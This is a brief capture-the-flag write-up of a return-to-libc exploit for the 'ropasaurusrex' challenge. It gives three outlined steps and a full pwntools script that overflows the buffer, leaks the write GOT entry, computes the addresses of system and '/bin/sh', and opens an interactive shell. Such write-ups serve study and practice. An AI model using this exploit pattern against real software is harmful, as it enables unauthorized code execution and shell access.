GOT-01
OK this one was quite interesting exploit , it was too got exploit only but it's different & the exploit goes like this
1.) Oveflow until you reach eip
2.) Now use write function to leak the value @ got Table so that we can calculate system and '/bin/sh' address
3.) Now again trigger the vulnerable func again and then now use r2libc attack :)
I used this to solve rop3 in picoctf && ropasaurusrex
from pwn import *
write_plt=0x0804830c
vuln=0x08048426
write_got=0x08049614
system_offset=0x9e630
bin_offset=0x85e4b
payload="A"*140+pack(write_plt)+pack(vuln)+pack(1)+pack(write_got)+pack(4)
p=process("ropasaurusrex")
p.sendline(payload)
a=p.recv(4)
a=u32(a)
print "[+] Leaked Address"
print hex(a)
print "[+] Target address"
system=a-system_offset
print hex(system)
binaddr=a+bin_offset
payload="A"*140+pack(system)+pack(0xdeadbeef)+pack(binaddr)
p.sendline(payload)
p.interactive()